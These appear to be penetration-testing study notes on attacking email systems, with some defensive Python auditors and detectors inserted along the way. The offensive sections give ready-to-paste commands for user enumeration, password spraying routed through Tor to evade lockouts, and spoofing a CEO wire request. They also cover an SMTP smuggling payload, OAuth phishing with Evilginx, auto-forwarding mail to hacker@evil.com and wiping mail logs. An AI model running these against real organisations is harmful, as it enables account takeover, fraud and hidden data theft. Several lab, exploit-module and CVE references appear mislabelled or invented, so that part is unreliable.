SMTP

Learning Objectives

  • Master email protocols (SMTP, IMAP, POP3) as vectors for enumeration, credential theft, spoofing, and pivoting to internal networks.

  • Identify misconfigurations in on-prem (Exim/Postfix) vs. cloud (O365/GWS) deployments.

  • Execute attacks with evasion (e.g., proxy chaining for brute-force) and articulate mitigations (e.g., SPF/DMARC hardening).

  • New: Analyse email metadata for forensics and simulate phishing chains in reports.

Attack Surface Overview

# Common Vectors (Enhanced)
- Misconfigurations (open relay, anonymous VRFY/EXPN, weak TLS)
- User enumeration (VRFY/RCPT, cloud API leaks)
- Password attacks (brute-force, spraying, credential stuffing from breaches)
- Protocol exploits (SMTP smuggling, STARTTLS downgrade)
- Vulnerabilities (RCE in proxies, auth bypass in plugins)
- Spoofing/phishing (bypassing SPF/DKIM/DMARC)
- **New:** OAuth misconfigs (token replay in O365/GWS)
- **New:** Metadata exfil (e.g., via IMAP searches for PII)
- **New:** Supply-chain (vulnerable plugins like Post SMTP in WordPress)

Enumeration (Stealth → Aggressive)

Prioritise passive DNS recon to avoid direct probes. Use timing delays (--max-rate 50) for IDS evasion.

# 1. Passive DNS Recon (MX/A/TXT for SPF/DKIM/DMARC)
dig mx <domain> +short  # MX records
dig a <mail.example.com> +short  # A records
dig txt <domain> | grep -E "spf|dkim|dmarc"  # Auth records
# Amass for subdomains/emails: 
amass enum -d <domain> -o amass.txt
# Tools: 
MXToolbox.com (web), DNSdumpster.com (visual map)
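Added example (not part of the original notes): an offline SPF record auditor in Python that applies the checks a reviewer runs on the `dig txt` output above. The sample records are constructed, not real domains' data; the weak-`all` findings and the 10-lookup limit come from RFC 7208.

```python
import re
from typing import Dict, List, Optional

# Constructed sample records (stand-ins for what `dig txt <domain> +short` returns)
SAMPLE_RECORDS = {
    "example.com": "v=spf1 include:_spf.google.com include:spf.protection.outlook.com "
                   "ip4:203.0.113.0/24 ~all",
    "weak.example": "v=spf1 a mx include:a.example include:b.example include:c.example "
                    "include:d.example include:e.example include:f.example include:g.example "
                    "include:h.example include:i.example +all",
    "nopolicy.example": "v=spf1 ip4:198.51.100.7",
}

# Mechanisms/modifiers that cost a DNS lookup under RFC 7208 section 4.6.4 (limit: 10)
LOOKUP_TERMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def audit_spf(record: str) -> Dict[str, object]:
    """Audit one SPF TXT record string; returns validity, lookup count, 'all' qualifier, findings."""
    findings: List[str] = []
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return {"valid": False, "lookups": 0, "all": None, "findings": ["not an SPF record"]}

    lookups = 0
    all_qualifier: Optional[str] = None
    for term in terms[1:]:
        qualifier = "+"                      # implicit qualifier is Pass
        if term[0] in "+-~?":
            qualifier, term = term[0], term[1:]
        # mechanism name is everything before ':' or '/' (modifiers use '=')
        name = re.split(r"[:/=]", term, maxsplit=1)[0].lower()
        if name in LOOKUP_TERMS:
            lookups += 1
        if name == "all":
            all_qualifier = qualifier
        elif name == "ptr":
            findings.append("ptr mechanism is deprecated (RFC 7208 s.5.5) and slow to evaluate")

    if all_qualifier is None:
        findings.append("no 'all' term: senders that match nothing get Neutral, so the policy decides nothing")
    elif all_qualifier == "+":
        findings.append("'+all' authorises every host on the internet: equivalent to having no SPF")
    elif all_qualifier == "?":
        findings.append("'?all' is Neutral: receivers cannot distinguish spoofed from unmatched senders")
    if lookups > 10:
        findings.append(f"{lookups} DNS-lookup terms exceed the RFC 7208 limit of 10: receivers return PermError")

    return {"valid": True, "lookups": lookups, "all": all_qualifier, "findings": findings}


if __name__ == "__main__":
    for domain, record in SAMPLE_RECORDS.items():
        result = audit_spf(record)
        status = "OK" if result["valid"] and not result["findings"] else "WEAK"
        print(f"{domain}: {status} ({result['lookups']} lookups, all={result['all']})")
        for finding in result["findings"]:
            print(f"  - {finding}")
```

Feed it the quoted TXT string from `dig`; `include:` targets are counted but not resolved, so a record that nests further includes can exceed the limit even when this count is under 10.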

# 2. Email Harvesting
theHarvester -d <domain> -b all -f harvest.html  # Emails, hosts from multiple sources
# Holehe for disposable email checks: 
holehe --only-email user@domain.com

# 3. Service Discovery (Nmap with Scripts)
nmap -Pn -sV -sC -p25,110,143,465,587,993,995 --script=banner,ssl-enum-ciphers <IP> -T2  # Stealthy, check TLS
# Masscan for ranges: 
masscan -p25,587 10.10.10.0/24 --rate=500 --open-only
# IMAP/POP3 Scripts: 
nmap -p110,143,993,995 --script=imap-capabilities,pop3-ntlm-info <IP>  # pop3-ntlm-info needs the POP3 ports (110/995)

# 4. Exposed Services Scan
shodan search "port:25 smtp" --fields ip_str,port,org  # Public mail servers
# Censys: 
censys search "services.port:25 and services.protocol:SMTP" --fields host,autonomous_system.organization

Instructions: Log all outputs (-oN enum.txt). Start passive (Amass/TheHarvester) for 80% intel without alerts. Cross-reference with Shodan for version fingerprinting (e.g., "Exim 4.97").

Report: "MX: mail.example.com → Exposed on 25/TCP → Risk: Open relay potential."

Authentication & Misconfigurations

Test for legacy auth (e.g., plain-text POP3). Document weak TLS (e.g., SSLv3 support).

# SMTP User Enum (Manual + Tool)
telnet <IP> 25
HELO test.local
VRFY user@domain.com  # 250 = exists, 252 = server will not verify, 550 = unknown
EXPN mailinglist@domain.com  # Expands lists
MAIL FROM:<test@domain.com>  # Required before RCPT TO (503 otherwise)
RCPT TO:<user@domain.com>  # 250 OK = valid, 550 = unknown
# Tool: 
smtp-user-enum -M VRFY,EXPN,RCPT -U users.txt -t <IP> -v

# **New:** POP3/IMAP Enum
telnet <IP> 110  # POP3
USER testuser  # +OK with no error = valid
# IMAP (the LOGIN line is typed inside the TLS session): 
openssl s_client -connect <IP>:993 -quiet
a1 LOGIN user pass
# Tool: 
hydra -L users.txt -p test <IP> pop3  # Quick validity check

# **New:** TLS Downgrade Test
nmap -p465,587 --script ssl-enum-ciphers <IP>  # Weak ciphers?
testssl.sh <IP>:587  # Full TLS audit (install via apt)

# Common Weak Configs
- Anonymous relay: swaks --server <IP> --to external@other.com
- No STARTTLS enforcement: telnet <IP> 587, then EHLO test (AUTH advertised before STARTTLS = credentials in clear)
- IMAP: Unencrypted 143/TCP open (sniff creds with Wireshark)
- Default creds (postmaster/no-pass) or null binds (POP3: USER '')

Instructions: Use swaks for safe relay tests: swaks --server <IP> --from test@domain --to victim@domain --body "Test". If the relay works, note bounce addresses. For reporting: "Misconfig: VRFY enabled → Enum 50 users → Impact: Targeted phishing."

Cloud Enumeration & Attacks

Focus on API abuse; use proxies to evade lockouts.

# Office 365 (O365)
o365spray.py --validate --domain <domain>  # Check domain validity
o365spray.py --enum -U users.txt --domain <domain> --proxy socks5://127.0.0.1:9050  # Tor evasion
# AADInternals for tenant recon: 
Get-AADIntTenantDetail -Domain <domain>
# OAuth Abuse: 
Register rogue app via Azure portal sim (lab), replay tokens with curl

# Google Workspace (GWS)
enum_google.py --domain <domain>  # User enum via APIs
# GSuite Enumeration: 
gsuite-enum -d <domain> -u users.txt
# Phishing Sim: 
Use Evilginx2 for OAuth phish: evilginx2 -p ./phishlets/gws.letsencrypt

# Common Cloud Weaknesses
- Weak MFA bypass (e.g., legacy auth in O365)
- Over-permissive apps (GWS: Check via admin console sim)
- Bulk sender non-compliance (Gmail 2025 rules: No DMARC → Blocks)

Instructions: Limit to 1 req/sec in scripts (--delay 1). Test in lab O365 tenant (free trial). Report: "Cloud Enum: 20 valid users via o365spray → Spray weak passes → High impact (domain-wide compromise)."

Password Attacks

Incorporate spraying (same pass, many users) over brute-force to evade detection.

# On-Prem (Hydra/Medusa)
hydra -L users.txt -P rockyou.txt -t 4 <IP> smtp -s 587  # Thread limit, STARTTLS
# Medusa: 
medusa -h <IP> -U users.txt -P passes.txt -M smtp -m DIR:/dev/null

# Cloud Spraying
o365spray.py --spray -U users.txt -p Summer2025! --count 2 --lockout 300 --domain <domain>  # 2 attempts, 5min wait
# MailSniper (PowerShell): 
Import-Module MailSniper.ps1; Invoke-SprayMailbox -Usernames users.txt -Password P@ssw0rd -Domain <domain>
# CrackMapExec for hybrid: 
cme smb <DC> -u users.txt -p pass --gen-relay-list relays.txt  # If AD-integrated mail

# Credential Stuffing
crowbar -s smtp/25 -S <IP> -u users.txt -c breaches.txt -r 10 -t 5  # From HaveIBeenPwned dumps

Instructions: Rotate proxies/VPNs every 50 attempts. Monitor for lockouts (e.g., 429 errors). Use SecLists wordlists tailored to seasons (e.g., "Password2025"). Report: "Spray: 5% success rate → Access to admin@ → Pivots to SharePoint."
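Added example (not from the original notes): a Python detector for the two activities described in the SMTP user-enumeration block and in this password-attacks section, run over constructed Postfix/Dovecot syslog lines. Enumeration shows up as VRFY/EXPN rejects plus bursts of "User unknown" RCPT rejects from one client; spraying shows up as many distinct usernames failing auth from one client. The log lines, IPs and thresholds are invented for the example.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed sample log lines in Postfix smtpd and Dovecot imap-login syslog format.
# Invented for this example; addresses are documentation ranges (RFC 5737).
_RCPT_REJECT_FMT = (
    "Jun 12 10:00:{sec:02d} mx postfix/smtpd[2101]: NOQUEUE: reject: RCPT from {host}[{ip}]: "
    "550 5.1.1 <{rcpt}>: Recipient address rejected: User unknown in local recipient table; "
    "from=<probe@test.invalid> to=<{rcpt}> proto=ESMTP helo=<{host}>"
)
_AUTH_FAIL_FMT = (
    "Jun 12 10:01:{sec:02d} mx dovecot: imap-login: Disconnected (auth failed, 1 attempts in 2 secs): "
    "user=<{user}>, method=PLAIN, rip={ip}, lip=10.0.0.2, TLS"
)
SAMPLE_LOG = "\n".join(
    ["Jun 12 10:00:01 mx postfix/smtpd[2101]: NOQUEUE: reject: VRFY from unknown[203.0.113.5]: "
     "502 5.5.1 VRFY command is disabled; to=<alice@example.com> proto=SMTP helo=<scanner>"]
    + [_RCPT_REJECT_FMT.format(sec=2 + i, host="unknown", ip="203.0.113.5", rcpt=f"{u}@example.com")
       for i, u in enumerate(["bob", "carol", "dave", "erin", "frank"])]
    + [_RCPT_REJECT_FMT.format(sec=9, host="mail.partner.example", ip="198.51.100.9", rcpt="old@example.com")]
    + [_AUTH_FAIL_FMT.format(sec=i, user=u, ip="203.0.113.77")
       for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    + [_AUTH_FAIL_FMT.format(sec=30, user="carol", ip="192.0.2.10")]
)

IP = r"(?P<ip>[0-9a-fA-F.:]+)"
RCPT_UNKNOWN = re.compile(r"reject: RCPT from \S+\[" + IP + r"\]: 5\d\d .*User unknown")
VRFY_EXPN = re.compile(r"reject: (?:VRFY|EXPN) from \S+\[" + IP + r"\]")
AUTH_FAIL = re.compile(r"(?:imap|pop3)-login: .*auth failed.*user=<(?P<user>[^>]*)>.*rip=" + IP)


def analyse(log_text: str, enum_threshold: int = 5, spray_threshold: int = 5) -> List[Tuple[str, str, int]]:
    """Return (alert_type, client_ip, count) for clients whose activity crosses a threshold."""
    probes: Dict[str, int] = defaultdict(int)             # VRFY/EXPN + unknown-recipient RCPTs per IP
    failed_users: Dict[str, Set[str]] = defaultdict(set)  # distinct usernames failing auth per IP
    for line in log_text.splitlines():
        if m := RCPT_UNKNOWN.search(line):
            probes[m["ip"]] += 1
        elif m := VRFY_EXPN.search(line):
            probes[m["ip"]] += 1
        elif m := AUTH_FAIL.search(line):
            failed_users[m["ip"]].add(m["user"])

    alerts = []
    for ip, count in probes.items():
        if count >= enum_threshold:
            alerts.append(("enumeration", ip, count))
    for ip, users in failed_users.items():
        # Spraying = one source, few passwords, many accounts: count accounts, not attempts
        if len(users) >= spray_threshold:
            alerts.append(("password-spray", ip, len(users)))
    return sorted(alerts)


if __name__ == "__main__":
    for kind, ip, count in analyse(SAMPLE_LOG):
        print(f"{kind:15} {ip:16} {count}")
```

The partner host with a single stale recipient and the client with one failed login stay below threshold; counting distinct accounts rather than attempts is what separates a spray from a user mistyping a password. On a real host, time-window the counters and read from `/var/log/mail.log` (path varies by distribution).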

Protocol-Specific Attacks

A. SMTP (Enhanced with Smuggling)

# Open Relay Test
nmap -p25 --script smtp-open-relay <IP>
swaks -tls --server <IP> --from external@other.com --to internal@domain.com --body "Relay test"
# SMTP Smuggling (CVE-2024-27305): 
swaks --server <IP> --body $'\r\n.\r\nDATA\r\nRCPT TO: <victim>\r\nDATA\r\n.\r\n'  # Double CR/LF bypass
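Added example (not from the original notes): the receiving-side check that a hardened MTA or mail gateway applies to a DATA payload to catch smuggling. RFC 5321 defines only `<CRLF>.<CRLF>` as end-of-data and forbids bare CR or LF in the stream; a lone-dot line delimited by anything else is what a lenient downstream server misreads as a message boundary. The two payloads are constructed for the example and use fictional addresses.

```python
import re
from typing import List, Tuple

# Constructed sample DATA payloads (bytes as the client sends them, terminator included).
BENIGN = b"Subject: status\r\n\r\nAll systems nominal.\r\n.\r\n"
# Ends the first message with a bare-LF dot line, then carries a second envelope and message.
SMUGGLED = (
    b"Subject: status\r\n\r\nAll systems nominal.\n.\n"
    b"MAIL FROM:<ceo@example.com>\r\nRCPT TO:<victim@example.com>\r\nDATA\r\n"
    b"Subject: Urgent\r\n\r\nsecond message\r\n.\r\n"
)

# A line holding a single "." with any CR/LF combination as its delimiters.
DOT_LINE = re.compile(rb"(?P<pre>\r\n|\r|\n|^)\.(?P<post>\r\n|\r|\n)")
CANONICAL = b"\r\n.\r\n"


def find_dot_lines(data: bytes) -> List[Tuple[int, bytes, bytes]]:
    """Every lone-dot line as (offset, delimiter before, delimiter after)."""
    return [(m.start(), m.group("pre"), m.group("post")) for m in DOT_LINE.finditer(data)]


def smuggling_indicators(data: bytes) -> List[str]:
    """Findings a receiving MTA should raise before accepting (or relaying) a DATA payload."""
    findings: List[str] = []
    dots = find_dot_lines(data)
    if not dots:
        return ["no end-of-data marker"]
    # Correct dot-stuffing means a conforming client never sends a lone dot before the real terminator.
    for offset, pre, post in dots[:-1]:
        findings.append(f"lone dot line at offset {offset} delimited by {pre!r}/{post!r} before the terminator")
    if not data.endswith(CANONICAL):
        findings.append("payload does not end with CRLF.CRLF")
    # RFC 5321 s.2.3.8: bare CR or LF must not appear in DATA. A relay that forwards them unchanged
    # can be paired with a downstream server that treats <LF>.<LF> as end-of-data.
    if re.search(rb"\r(?!\n)|(?<!\r)\n", data):
        findings.append("bare CR or LF inside DATA (RFC 5321 requires CRLF)")
    return findings


if __name__ == "__main__":
    for label, payload in (("benign", BENIGN), ("smuggled", SMUGGLED)):
        print(label, smuggling_indicators(payload) or ["clean"])
```

The same two rules are the mitigation: a relay must reject or normalise bare CR/LF before forwarding, and a receiver must accept nothing but `<CRLF>.<CRLF>` as the terminator. This is also what to look for in the Wireshark capture mentioned in the instructions below.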

# Spoofing (Bypass Auth Checks)
telnet <IP> 25
HELO spoof.com
MAIL FROM:<ceo@domain.com>
RCPT TO:<victim@domain.com>
DATA
Subject: Urgent Wire
Pay $10k now.
.
QUIT
# Automated: 
python3 smtp_spoof.py <IP> <from> <to> <msg>
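Added example (not from the original notes): a Python DMARC evaluator showing why the spoofed transcript above is rejected by a domain with a real policy and delivered by one that only monitors. It takes the identifiers a receiver already has (the visible From domain, the MAIL FROM domain if SPF passed, the `d=` domains of verified DKIM signatures) and applies the alignment rules of RFC 7489. The records are constructed for a fictional `example.com`; organisational-domain detection is simplified to the last two labels (real code consults the Public Suffix List).

```python
from typing import Dict, List, Optional


def parse_dmarc(record: str) -> Dict[str, str]:
    """Split a DMARC TXT record ('v=DMARC1; p=reject; ...') into a tag dictionary."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def org_domain(domain: str) -> str:
    """Organisational domain. Assumption: last two labels; real evaluators use the Public Suffix List."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(header_from: str, auth_domain: Optional[str], mode: str) -> bool:
    """Identifier alignment per RFC 7489 s.3.1: strict = exact match, relaxed = same organisational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return header_from.lower() == auth_domain.lower()
    return org_domain(header_from) == org_domain(auth_domain)


def evaluate_dmarc(header_from: str, spf_pass_domain: Optional[str],
                   dkim_pass_domains: List[str], record: str) -> Dict[str, object]:
    """
    header_from:       domain of the RFC5322.From header (what the user sees)
    spf_pass_domain:   MAIL FROM domain if SPF returned Pass, else None
    dkim_pass_domains: d= domains of DKIM signatures that verified
    record:            the From domain's _dmarc TXT record
    """
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return {"result": "none", "disposition": "none", "spf_aligned": False, "dkim_aligned": False}
    spf_ok = aligned(header_from, spf_pass_domain, tags.get("aspf", "r").lower())
    dkim_ok = any(aligned(header_from, d, tags.get("adkim", "r").lower()) for d in dkim_pass_domains)
    passed = spf_ok or dkim_ok
    policy = tags.get("p", "none").lower()
    disposition = "none" if passed else (policy if policy in ("quarantine", "reject") else "none")
    return {"result": "pass" if passed else "fail", "disposition": disposition,
            "spf_aligned": spf_ok, "dkim_aligned": dkim_ok}


# Constructed records for the fictional domain
STRICT_DKIM_REJECT = "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc-reports@example.com"
MONITOR_ONLY = "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.com"

if __name__ == "__main__":
    # The spoofing transcript above: From ceo@example.com injected through a relay whose IP is not
    # in example.com's SPF, and nothing DKIM-signed. SPF fails, so spf_pass_domain is None.
    print("spoof via relay:", evaluate_dmarc("example.com", None, [], STRICT_DKIM_REJECT))
    # Same message at a domain that only monitors: delivered, report sent to rua.
    print("spoof, p=none:  ", evaluate_dmarc("example.com", None, [], MONITOR_ONLY))
    # Legitimate bulk mail: MAIL FROM bounces.example.com passes SPF, relaxed aspf accepts it.
    print("bulk sender:    ", evaluate_dmarc("example.com", "bounces.example.com", [], STRICT_DKIM_REJECT))
    # DKIM signed with a subdomain key, but adkim=s demands an exact match: alignment fails.
    print("strict dkim:    ", evaluate_dmarc("example.com", None, ["mail.example.com"], STRICT_DKIM_REJECT))
```

The `p=none` case is the hardening point: monitoring-only policies produce reports but block nothing, so the mitigation for the spoof above is moving the From domain to `p=quarantine` or `p=reject` once legitimate senders are aligned.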

# STARTTLS Downgrade
openssl s_client -connect <IP>:587 -starttls smtp -crlf -msg  # Force downgrade if weak

B. POP3/IMAP (New Section)

# Connect & Enum
telnet <IP> 110  # POP3
USER admin
PASS pass123  # +OK = success
# IMAP (commands typed inside the TLS session): 
openssl s_client -connect <IP>:993
a LOGIN user pass
b LIST "" "*"
# Mailbox Dump: 
imapfilter -c script.lua  # Host, user, pass and the searches are defined in the Lua config (no host/user flags)

# Attacks: Sniffing (MITM with sslstrip), or priv esc via weak storage (e.g., /var/mail readable)
# IMAP Folder Manipulation (inside the session): 
a CREATE "Inbox/Phish"
b APPEND "Inbox/Phish" (\Seen) {100}  # {n} = byte count of the message that follows; server answers "+" and then expects exactly n bytes

Instructions: For smuggling, validate with Wireshark (look for split commands). Clean up test mails post-attack. Evasion: Encode subjects in Base64. Report: "Spoof via open relay → Delivered phishing → Medium impact (social engineering vector)."

Latest CVEs (2024–2025) (Updated)

On-Prem Servers:
- CVE-2024-27938: Postal SMTP Smuggling (spoofing via malformed commands).
  └ PoC: Double CRLF in DATA; Affects <3.0.0.
- CVE-2024-39929: Exim file extension bypass (deliver exes via mail).
  └ Metasploit: auxiliary/dos/exim/file_bypass; Scan: Shodan "Exim 4.97".
- CVE-2025-26794: Exim SQLi via SQLite hints (RCE potential).
  └ Exploit: Injected queries in ETRN; Patch to 4.98.1.
- CVE-2025-30232: Exim use-after-free (DoS/RCE).
  └ Trigger with malformed headers; Reported March 2025.
- CVE-2025-7624: Sophos Firewall SMTP proxy SQLi to RCE.
  └ If quarantining enabled; PoC on GitHub.

Cloud:
- CVE-2025-32711: M365 "EchoLeak" zero-click AI vuln (email metadata leak).
  └ Affects Outlook; CISA KEV.
- ED 25-02: Exchange Server auth bypass (O365 hybrid).
  └ Mitigate by Dec 2025; ProxyLogon successor.
- GWS OAuth Bypass: 2024 email auth flaw (account takeover).
  └ Replay tokens; 2025 phishing surge via apps.

WordPress/Plugins:
- CVE-2025-24000: Post SMTP auth bypass (site takeover).
  └ Affects 400k+ installs; CVSS 8.8.

# Scan with Nuclei
nuclei -u <IP> -t cves/2024/CVE-2024-39929.yaml -t cves/2025/CVE-2025-26794.yaml -severity high,critical
# Metasploit (one command per line in msfconsole): 
use exploit/multi/smtp/exim_sql_injection
set RHOST <IP>
run

Instructions: Replicate in Docker (e.g., a vulnerable Exim image). Read NVD for each; note CVSS/impact. Include in reports: "CVE-2025-26794 unpatched → SQLi → RCE → Critical (full server access). Patch: Upgrade Exim."

Post-Exploitation & Persistence

# Exfil Data (IMAP Search)
curl -u user:pass 'imaps://<IP>/INBOX' -X 'SEARCH ALL'  # Mailbox path is required; lists UIDs, then FETCH for content
# Mailbox Rules (O365): 
Set-MailboxFolderPermission -Identity user:\Inbox -User hacker -AccessRights Owner
# PowerShell: 
New-InboxRule -Name Backdoor -RedirectTo hacker@evil.com  # Persistence via auto-forward

# Phishing Persistence: 
Embed beacons in sigs; monitor via rules
# Cleanup: 
Delete test mails; rm /var/log/maillog entries if root

Instructions: For persistence, test forwarding loops in the lab. Exfil to Burp for analysis. Report: "Post-Exploit: Added forward rule → Ongoing exfil → Mitigation: Audit rules quarterly."
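Added example (not from the original notes): the quarterly rule audit the mitigation above calls for, as a Python script over a constructed export resembling `Get-InboxRule | ConvertTo-Json`. It flags the patterns this section describes: forwarding or redirecting to an external domain, deleting or filing messages that match sensitive subject words, marking hidden mail as read, and rule names that are blank or punctuation only. The tenant domains, hiding folders, keyword list and the sample rules are assumptions for the example.

```python
import json
import re
from typing import List, Tuple

# Assumptions for this example: the tenant's own domains, folders attackers use to hide mail,
# and subject keywords attackers filter on. Tune these to the environment.
INTERNAL_DOMAINS = {"example.com"}
HIDING_FOLDERS = {"rss feeds", "rss subscriptions", "conversation history", "junk email",
                  "deleted items", "archive"}
SENSITIVE_WORDS = {"password", "invoice", "wire", "payment", "security", "mfa", "phish", "suspicious"}

# Constructed sample resembling `Get-InboxRule -Mailbox <user> | ConvertTo-Json` output (fields trimmed).
SAMPLE_RULES = json.dumps([
    {"Name": "Backdoor", "Enabled": True, "RedirectTo": ["\"hacker\" [SMTP:hacker@evil.example]"],
     "DeleteMessage": False, "MoveToFolder": None, "MarkAsRead": False, "SubjectContainsWords": None},
    {"Name": ".", "Enabled": True, "RedirectTo": None, "DeleteMessage": True, "MoveToFolder": None,
     "MarkAsRead": True, "SubjectContainsWords": ["password", "security alert", "wire"]},
    {"Name": "Newsletters", "Enabled": True, "RedirectTo": None, "DeleteMessage": False,
     "MoveToFolder": "Mailbox\\Newsletters", "MarkAsRead": True, "SubjectContainsWords": ["digest"]},
    {"Name": "Invoices to AP", "Enabled": True, "ForwardTo": ["ap@example.com"], "DeleteMessage": False,
     "MoveToFolder": None, "MarkAsRead": False, "SubjectContainsWords": ["invoice"]},
])

EMAIL = re.compile(r"[\w.+-]+@[\w.-]+\.\w+")


def external_recipients(values) -> List[str]:
    """Pull addresses out of Exchange recipient strings and keep those outside INTERNAL_DOMAINS."""
    found = []
    for value in values or []:
        for addr in EMAIL.findall(str(value)):
            if addr.rsplit("@", 1)[1].lower() not in INTERNAL_DOMAINS:
                found.append(addr.lower())
    return found


def audit_rules(rules_json: str) -> List[Tuple[str, List[str]]]:
    """Return (rule name, reasons) for every rule matching a known persistence or hiding pattern."""
    flagged = []
    for rule in json.loads(rules_json):
        reasons: List[str] = []
        ext = (external_recipients(rule.get("ForwardTo")) + external_recipients(rule.get("RedirectTo"))
               + external_recipients(rule.get("ForwardAsAttachmentTo")))
        if ext:
            reasons.append("forwards or redirects to external address: " + ", ".join(ext))
        folder = (rule.get("MoveToFolder") or "").split("\\")[-1].lower()
        hides = bool(rule.get("DeleteMessage")) or folder in HIDING_FOLDERS
        words = {w.lower() for w in (rule.get("SubjectContainsWords") or [])}
        if hides and words & SENSITIVE_WORDS:
            reasons.append("hides messages matching sensitive words: " + ", ".join(sorted(words & SENSITIVE_WORDS)))
        if hides and rule.get("MarkAsRead"):
            reasons.append("marks hidden messages as read (suppresses the unread badge)")
        if not rule.get("Name", "").strip(" ._-"):
            reasons.append("rule name is blank or punctuation only")
        if reasons:
            flagged.append((rule.get("Name", ""), reasons))
    return flagged


if __name__ == "__main__":
    for name, reasons in audit_rules(SAMPLE_RULES):
        print(f"[!] rule {name!r}")
        for reason in reasons:
            print("    -", reason)
```

Disabled rules are still reported, since an attacker can re-enable one later; the same checks apply to transport rules and to `Set-Mailbox -ForwardingSmtpAddress`, which this script does not cover.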

Key Commands Summary (Copy-Paste Ready)

# Enum
dig mx <domain>; theHarvester -d <domain> -b all
nmap -p25,587 --script smtp-open-relay <IP>

# Auth/Misconfig
smtp-user-enum -M VRFY -U users.txt -t <IP>
swaks --server <IP> --from spoof@domain --to victim@domain

# Attacks
hydra -L users.txt -P rockyou.txt <IP> smtp -s 587
o365spray.py --spray -U users.txt -p pass --domain <domain>

# Cloud
Get-AADIntTenantDetail -Domain <domain>
gsuite-enum -d <domain> -u users.txt

# CVE Test
nuclei -u <IP> -t cves/2025/CVE-2025-26794.yaml

Prep & Practice Plan

Defensive Awareness (New): After labs, simulate blue-team (e.g., Snort rules for SMTP smuggling). Review RFC 5321 for protocol quirks.

Weekly Schedule (4-Week Cycle):
[ ] Mon: 30 min theory/CVEs + 60 min passive enum
[ ] Tue-Thu: 120 min attacks (rotate on-prem/cloud)
[ ] Fri: 45 min spraying/evasion + 30 min IMAP/POP3
[ ] Sat: 90 min full chain (enum → spoof → exfil) + report
[ ] Sun: Review, mock Q&A (e.g., "Mitigate SMTP smuggling")

Daily Checklist:
[ ] 30 min: Theory + CVEs (NVD/Exploit-DB)
[ ] 90 min: Lab (screenshots/steps)
[ ] 30 min: Report snippet (finding → exploit → impact → mit)
[ ] **New:** 15 min: Quiz (e.g., "Bypass DMARC on this spoof")

Labs (Expanded):
- Metasploitable 2 (SMTP relay) – VulnHub
- HackTheBox: "Mailroom" (Exim RCE), "Sauna" (O365)
- TryHackMe: "Email Basics", "SMTP Enumeration"
- **New:** OverTheWire: Natas (web-mail SQLi chain)
- **New:** VulnHub: "Devel" (Postfix misconfigs)
- **New:** Custom: Docker mailcow + vulnerable Exim/Postfix images
- **New:** Proving Grounds: "Email-Hack" for timed phishing

Mock Exams:
- 2-hour sim: Target lab domain, output 5-page report with CVEs.
- Resources: eJPT modules, "Hacking Exposed: Web Apps" Ch. 12.
